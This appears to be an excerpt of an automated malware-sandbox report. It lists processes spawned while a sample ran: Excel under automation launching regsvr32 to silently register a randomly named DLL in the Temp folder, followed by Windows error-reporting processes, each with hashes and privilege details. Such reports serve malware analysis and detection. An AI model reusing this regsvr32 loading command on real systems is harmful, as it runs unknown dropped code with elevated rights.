Start time: 20:47:36
Start date: 11/01/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fef0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:47:43
Start date: 11/01/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Imagebase: 0xff490000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:47:43
Start date: 11/01/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: -s C:\Users\user\AppData\Local\Temp\cjrumqtd.dll.
Imagebase: 0xfa0000
File size: 14848 bytes
MD5 hash: 432BE6CF7311062633459EEF6B242FB5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 20:48:01
Start date: 11/01/2021
Path: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit): false
Commandline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1016
Imagebase: 0x13f0f0000
File size: 995024 bytes
MD5 hash: 45A078B2967E0797360A2D4434C41DB4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 20:48:01
Start date: 11/01/2021
Path: C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dwwin.exe -x -s 1016
Imagebase: 0xff080000
File size: 152576 bytes
MD5 hash: 25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis
